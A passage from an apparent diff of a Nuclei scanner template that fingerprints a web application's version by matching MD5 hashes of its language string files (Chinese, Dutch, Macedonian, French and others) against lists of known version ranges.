1.3.3 + dsl: + - "(\"fa48b9526fec9efc77207efe8772967e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"5f98ee09ca673f5d17db0618dc270213\" == md5(body))" + - type: dsl + name: 
1.2.9 - 1.2.10 + dsl: + - "(\"04cbb7b88d84e5654a23bb90089e9189\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"b82e9f0187ac30ad51f76955a8ccf449\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"3a178d7c5372d8ffff8aa81e94a4fbd2\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"74b4f2f62f2f56a45002bc552be41432\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"32b6aeb6d8cc7ec05d022b1c80625835\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"cd56cafe33a0ca1bc7cc799b9ab0ef06\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"13aea94e836c5b164e7858f87d5309f7\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"3557b0f2c2da1616ef1fcc5824d6c469\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"1815ce3f23cc1f7138d6b397dcf9dba3\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"d08742de9f6da840cbfbe18217e17916\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"12fc4af656a8a09cc166f184b8fcdf4f\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"0fce131fa69513638f7ba99b8193a847\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"0184a8e0f815a68ec3c14ffe021758fa\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d2d41ac1b60f340c2aceb67498efc18d\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"8ef29f8e748b6f442673678f5f1b1be3\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"c4150b7e7512436f86166ca5d04d63ab\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"26c7db61e1257676eac819e9093e1a6e\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"0b0a05a36f2e88a96696c3e1b852672c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"52d4939331bb9a36cefd91e448d138c9\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"2ea4b8ae7487e5fda7834302068be60c\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"932461f5255c2872f2584fa7b9fbffb6\" == 
md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"d15f8370507ba389d12826831c1a5ca6\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"9171ced4c182c7f8bb6a017fd9c85ede\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"d7a713b0ef6c74b033609acce8733d8c\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"850eea207c653b9591a13816fd3a1523\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"caf1fd6d53b64ba79707b576b2749078\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"3c1bc62d07077c19f1e598eb232355f1\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"77636f1bd8473d9fcd757c9cf3265b70\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"3afc14c8814702b657f97c40e43fea11\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"c7a577ef5f16e12c7a50cac4a2cee149\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"27ec0037fe6491c469a0ea23634a6f97\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"740a50153fecb01757bbffe63ddc8b2e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"05fcd21241f64181dd704b05daa213fe\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"e3a4cd492840038edd2e552889d2d765\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d828cf629aba9f7d44103f82df23a37c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"e91495b5efad1f2c3dfdc753bc7acc2d\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"6ad73bc4d16807122f8177c75dd5ae15\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"f3b114a8948128c2ea99ab73fded5c1b\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"8d894629b366c3746ff92e6100c98dcc\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - 
"(\"985bf62bd4ffbf31b0390c88f0059ab8\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"3d960948172b7c2843bfbe0ff89e1fe4\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"32517881ee85aae3444df15a6134605a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"3dfb4e5d840f326101d340f16a3fc731\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"666a3d98579e2577b94f18b43ad99bbf\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"79cafbdf26d28e24914146b46944e3ff\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"3b9a51234c3cd6e96d3b7bb90d57e684\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"12213a1611ad8247134c074d1888fd41\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"ad13e676cd1b7942073883404a8f0fe3\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"b98e752d5cf1b203c8518cbfaf5b262b\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"14218025abeb016a300fbc132707312c\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"d33e327123c838ee393093c605ae6500\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"d24792d922216a224aa58bd9489e5f2d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"79a8a68cdfe7d1325535f029b672865d\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a00708b5c583267737a3d1d4741601c6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"50e97403a590b94cffc8621c18746425\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"aa15b82b14db7b7205d902394be0aeb2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2d14fbab394730aac3cd27714deae99a\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"9e3d50b39eb7d80b5cd939a18865e3bc\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0735dc23ae80b420c6439671c47ac889\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4481c30d17a87e924f10c4340dff7a70\" == md5(body))" + - type: dsl + name: 1.1.7 
- 1.1.9 + dsl: + - "(\"ceaba65a18ac31a84c2ce0bc6458ab09\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"ddc81b9d53795066accea13ec59e1d7c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"b72104d15855157e935bf578bd22a439\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"a9b4230af8dde3bc6a478cf7e288e567\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f424255530ea71eed33942e11adb8f3c\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"0a1f51bc374ebc390eb6abedde8e362b\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"172fcb87e508ca616671562a8b60c43b\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"85fc7d6c86e74f2661a79238d0dc9e31\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"b3e0f4a208d3bde86928629050609b33\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a30296398822cbb78269b3e5420a50c8\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"0a4a891e2ffc0479fe93ead7e17b9409\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"c541e1b601052401da5b5ae27fb9a00d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"ceaf3a0fdf749375d41f945cfebbfb73\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"fa181bd28184f55d1be96c054c7e850c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"4ee7137d971a0643a5e794736af2f42d\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"a4c92ab569b582eaac96924a13e7f7b6\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"06f0508962e8c3c1a0fafc590ecb428b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"09f6bada3004509bf6a3c2da9a180e5b\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ffd7a22238f44ba9d058923700b23bd0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_dutch.txt" + + matchers: + - type: 
dsl + name: 2.5.0 - 2.11.1 + dsl: + - "(\"b0a7eed497a5049acbdecbe2ec9419cb\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"5fc875095aa819bdd3f3b4ea642cf07c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"f11ae092530feb3b446fd2085e1e432e\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"098699a884b17043d83800e88642c56a\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"6229d7148dc06623168afc5eead06a40\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"eb423a034935ba360c2fff586308d972\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"a41dc8af0335d2cd86426635b9ef16d5\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"13c3aeac8b3bf8ab89839aa3ff24ff39\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"4505e9c3be3e48217e7f8412fb51339c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9828cc510aa8003be212c064344853fc\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"bb6c972d14a5ef2e27c2fe125e6d3da3\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"b356b7bdc7f9bcd7db308814afcee200\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"4bd7b61b3b5f9997358d0d0a2da49a4d\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"8b787c2df95ba5c6596a97314fc15abc\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"b262826a56849c0a4ba14be25ff1a943\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"af2cb47ba0fa465174d4a4f981699201\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"88c726b47e0e8eb264e8d360bc982e7c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7616569b719259b8f5c7ffc3c4390e5f\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"caf8bc47ae0495ad6155a1139161bb8d\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"310f116eb72b4b70bb7a94bced9a242c\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - 
"(\"974a35201a8bd103bc10a6f1e6e0d676\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"305123df0add03573c1c202cf4b2f09c\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"240047f035d6094ecb303a1a9adb5775\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"339e2f3ea9f7be0bfa4e881daf8dbfd3\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"3add38496863e38e50eee35ac1aee8d6\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"d048c83599902d1fd8312feba07a97fc\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"d4dda266ca80679bd87b2be51361a8a8\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"337b98037b2eb3ac7a2f790120d7f413\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"c5755a4bdb954e1bb004c74406379909\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f28b84071120e9f5c911d8079ee5970a\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"205a8bb1bf06939a6cba53182bd94cb4\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"8d269d78db89f3e98baecf91a6d42f26\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"9c31d7d8b0a1f8e00fbb6e9fb39a61c9\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"6621584bfdf3b81586467908c9107119\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"b099681941a1df7c2ed2cd059e40f1b5\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"098cc9240f3c727ef071add65cf10267\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"d6edf38820d1b015eb60279374fbe07d\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"e9a3ef2ce58ecc62aced84b1da755811\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"56630cb91afc8425e570db96cb1fa3cf\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"f72b9f7f5eb1fd521e6a650ed87d7616\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"678d7b6112714c2eb83c5bedf22f4271\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"a2d918a8933a1df0da12cd38ae7d29d6\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"b313f0552025a15bd886e8c07ca9143e\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"1dd19ff80552104a70dfe0ac61c5c38c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"5a8a527e5e6e1fbb5732c7fde3c7e3bf\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"856389c932ba96fc954b70fd75647dea\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"c22f19229a0c5919dc3eceaae430747b\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"607ba2df6785e7b9b9c0bc3691597232\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"b49f88913cf7130e6fa0cdf91568d79f\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"3315a9a167d2f75d36d79fe72372b39a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"315e23705e58dbdd3262c2dd711014fc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"52bceceea51d63debb632eeb3c1f3a7d\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"b6ec6d960a939eb86ab8bb24d9300d6c\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"92f3bbfe4144bd488da15e6c1ca03e1d\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"b32f0a7b647771c566d0987e5f3afa96\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"f25b1db32bb1bbc857ff2b6bbce62947\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"4c2170e18bd111b06c1865c1ddb61b40\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"b69d4bb392ec0ccf6ee07f240751fca1\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"991bf2b397c2ddeeb6e7985921fb9452\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - 
"(\"077718ed13c175b0934c75356a9ee00f\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"c4329e41220b74aab41b8fca0d878e09\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"72a76411edd6c24d20ce0d0f31c4d879\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"81a8b66f05711251178636630705d4a2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"ce2f0053deba5132ee46592610fcebaf\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"41f8eb85ed76caa52ed6a10ec333bce7\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"5fb3cc8647b6754bd05ded587be90f1e\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9c52fd3c98493baac4a12e73c7361374\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"56184f66928579e6afdc4c434af9e59a\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"676f89d3a5cca7c289990e501500e6df\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"4be7efeb39a3a1f314547985157fe587\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"51b9c665cae634b44cfe6a198fabbfc2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"7883591fafb2b53347ee41bb336ccd1e\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"82e3ebe701ff7d552f5250e25ede6747\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.8.1 + dsl: + - "(\"de344f5b9fca99d6c3e9687e925f65a1\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.9.1 + dsl: + - "(\"82554ad2258397a4ebc19ddb1fb985c7\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"e8894d4fa44f0f8f137e3eabe2a81035\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"372a3cd15fd6788c05de92c370c5ef7a\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"7a65ba0ce8260b1ede624f030129896e\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"63ffcfa83e62601e327329888db24d08\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - 
"(\"44f0abf6fb65186b88b506abb75c0a8b\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"7f7e8823007ef299115b9a63bb5a8836\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"9e8e545ae3e568d37757f9f804c55066\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"c3c885178ff8c973b656d959a2f3317a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"5c7b3d33f4290f1b25dc181d877ab4d4\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"b24257a3312b277df1737b3eb344e3e1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"ca319689c19c4877afeeb7fd5ae0ba85\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ebda0d41dcae87fb4ba77cd5ab675353\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"5be5d1a105b786ce318c405bef3e8995\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"290e60af751d83f0e2c1dd9b5501fe03\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"9ee5023b061f0890665cb5df9ec9b8da\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"6382215cf60174d890ec46cac6541d82\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"882b3b8647045bc23cb083c3ac123bcc\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"55ba7cf7c0f5e21185de0fdf02f26b9e\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"015b7dbf5df6c6d6ea00d8d17b61ba61\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"e330d37cd3bacfeb09f623c8ba054afd\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"aa296076e429c81dd23285860935133c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"705c7e3445310c9c7da0be55f8d13a0d\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"25e2a12720a1aa859cb53c540c8e66f9\" == md5(body))" + - type: dsl + name: 1.2.6 + 
dsl: + - "(\"b9c5680a973f12879c293a530011b0ba\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"61620afb4ac3f1c67f3f43bcf57b72e2\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"5f830df0a268b43bc5794b0393ee1567\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"c425b56808a315813e68ba7b1cb39676\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"fba6140c4929c4bf0faed9b026ce5ed5\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"7dc5492f2201a9ae37a7bad6d4e2ba19\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"a550b40d94b3c69f70da2813599940aa\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"938f2a18f47849452cc233a15ad1b612\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"72143266f4af99a58f2cbfaeafa1fcb3\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"f593de33a9047145b8729f01ff75c592\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2d1ab904c91a7c537b5edb8df63d956d\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"620c4fa296e41d0b2428c5304aff4b5c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3c50721c6e1ef4f9c70ca0336fa9fc7a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"991cee2ab7ffc380c7f206d5c2baba7a\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"775ec8f5a038dab65cbeadae69f43834\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fe93f9e71d3933e6d300132e7d5c1c8f\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9ecf2fb009eafe4e4d43c21ff55e03cb\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"b28e0165f737c46acbf541e406da2856\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"e8e933fccc6b2d057c3e45e9e24237b8\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"3c47d4f018ad4cc0108baa10e1d5130e\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"f3b1a00c903bccb5f7d80f8904807baa\" == 
md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"5c631130db755b06a1ae2420371f106d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"1dfa0777252bc259d8be8d26a4bf1743\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"0d1ab9138cd660420eab9c18c1193afe\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"719d7df3238cb61f72480343784f471b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"545c0bd95b63d0cc17c64756d945f6ec\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"f9e34df1e196f9b04734db7f750ac645\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"388d92d3a3251c1d93de50aa36e09ac1\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"2482ea81a35caa54a386c2ee6e86cd2c\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"e6f5d5f2e53a95152bb63adacc613308\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"a9b78f4b7b639da836f74cad7d37b7ff\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"07a1b810e74fbf4f3bf788884fa32601\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"9891e3f2689f7214eada23909d8f16a6\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"f64e70b7efb7b287aca5202a7596a712\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"93b613505ec0f72654b1d57aad82a2f1\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"de0d6cfb2b706e124c455b13e790be97\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"021c08ae7001def3dd87b89b1c21fd18\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"dd5c7f7e1486190230d71abf1c73c6e7\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"c5565edbdd421846cf82691e84e62fd9\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"fd642856c31543ceaa5354ed59908477\" == 
md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"840df113b5c95fbbd9b7befdde968caf\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"f8def4a235d38fefe97484bbcd97fd3a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"c08f08c79a91fdbad1108edd582ac12d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0b445a34c4fd21f86bce36f502fb934f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f3eed7609a755b9ce8115cc48879dbea\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"36a9a191105f3446f31115eed3f5b6b1\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"8d944bfe6710048ca00f9be794c4b139\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"f21b43c2ddfedcb13d80732d04fa2ee7\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"7263479a5307f0b3f95959d3e725d5b6\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"8fc2d1f22b5868bfcc1522569be68767\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"309d58cb02e442c518f657d922d12c20\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"96ce7eb03749dd0aa236ff6595c7133f\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"cb256c9c7a12fc62ee6eff0eb5da0d83\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"c5bb18f208a4ec7dc30323e102ca67a7\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.4 + dsl: + - 